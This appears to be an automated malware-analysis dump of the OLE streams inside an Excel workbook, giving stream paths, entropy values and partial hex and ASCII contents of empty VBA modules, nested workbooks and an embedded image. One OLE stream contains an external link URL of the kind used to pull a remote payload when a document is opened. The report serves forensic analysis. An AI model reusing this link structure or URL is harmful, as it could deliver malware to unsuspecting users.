                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:977
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 73 b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "Sheet1"
                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                VBA File Name:Sheet2.cls
                                                Stream Size:977
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf c3 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "Sheet2"
                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                VBA File Name:Sheet3.cls
                                                Stream Size:977
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 10 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "Sheet3"
                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:985
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 fa cf 70 1e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "ThisWorkbook"
                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.889430592781307
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                General
                                                Stream Path:\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:200
                                                Entropy:3.250350317504982
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . U X f . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                General
                                                Stream Path:MBD00438E0E/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:99
                                                Entropy:3.631242196770981
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0E/Package
                                                CLSID:
                                                File Type:Microsoft Excel 2007+
                                                Stream Size:94980
                                                Entropy:7.802479148242989
                                                Base64 Encoded:True
                                                Data ASCII:P K . . . . . . . . . . ! . . M v j . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 19 4d 76 6a ba 01 00 00 38 07 00 00 13 00 d9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.701136490257069
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:220
                                                Entropy:3.3813251513223976
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000673C0/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.219515110876372
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000673C0/Package
                                                CLSID:
                                                File Type:Microsoft Excel 2007+
                                                Stream Size:17987
                                                Entropy:7.459551056433264
                                                Base64 Encoded:True
                                                Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD00083EA7/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.219515110876372
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD00083EA7/Package
                                                CLSID:
                                                File Type:Microsoft Excel 2007+
                                                Stream Size:14238
                                                Entropy:7.30552548787177
                                                Base64 Encoded:True
                                                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000846C9/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000846C9/\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:708
                                                Entropy:3.6235698530352805
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000846C9/\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:372
                                                Entropy:2.913345911478729
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD000846C9/Workbook
                                                CLSID:
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:97808
                                                Entropy:7.365095307579232
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                General
                                                Stream Path:MBD00438E0F/MBD0018D4CE/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:20
                                                Entropy:0.5689955935892812
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/MBD0018D4CE/\x3ObjInfo
                                                CLSID:
                                                File Type:data
                                                Stream Size:4
                                                Entropy:0.8112781244591328
                                                Base64 Encoded:False
                                                Data ASCII:. . . .
                                                Data Raw:00 00 03 00
                                                General
                                                Stream Path:MBD00438E0F/MBD0018D4CE/Contents
                                                CLSID:
                                                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                Stream Size:197671
                                                Entropy:6.989042939766534
                                                Base64 Encoded:True
                                                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD00438E0F/Workbook
                                                CLSID:
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:386813
                                                Entropy:7.815032759709734
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                General
                                                Stream Path:MBD00438E10/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:774
                                                Entropy:4.473804902961029
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . $ C . 6 . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . h . A . N . T . n . N . H . 4 . ? . & . a . s . t . r . o . l . o . g . y . = . w . e . t . . & . a . b . o . l . i . s . h . m . e . n . t . = . s . c . i . n . t . i . l . l . a . t . i . n . g . & . p . a . v . e . m . e . n . t . . . . t S A f S . . M . ~ H 8 K . K G < . . . a ; . . T c . . . . . . . . . . . . . . . . . . . K . V . d . h . D . Y . i . P
                                                Data Raw:01 00 00 02 8f b5 d7 1e 24 43 04 36 00 00 00 00 00 00 00 00 00 00 00 00 cc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 68 00 41 00 4e 00 54 00 6e 00 4e 00 48 00 34 00 3f 00 26 00 61 00 73 00 74 00 72 00 6f 00 6c 00 6f 00 67 00 79 00
                                                General
                                                Stream Path:Workbook
                                                CLSID:
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:434913
                                                Entropy:7.99909358593359
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . W . / . m . ~ t B W . . L ` % . . E . j . O } ' . 9 . . . . z . . . . . . . + . . . \\ . p . $ \\ . , . b . u ~ D ^ . { . W K f D . . . N 0 U p N . | . w . . . . / m . X ( b > l 5 j _ . # _ . y > @ i % . S . h % B . . . ; . a . . . . . . = . . . ' : - . . . . . < . $ : [ . . 7 . . . . P . . . . . . . . . . . . . . . . . s . . . . = . . . [ / _ . f l . ] @ . . . . . . . " . . . d b . . . . ( @ . . . ) . . . . 1 . . . . V M . V . J q r . l J . H . 4 1 .
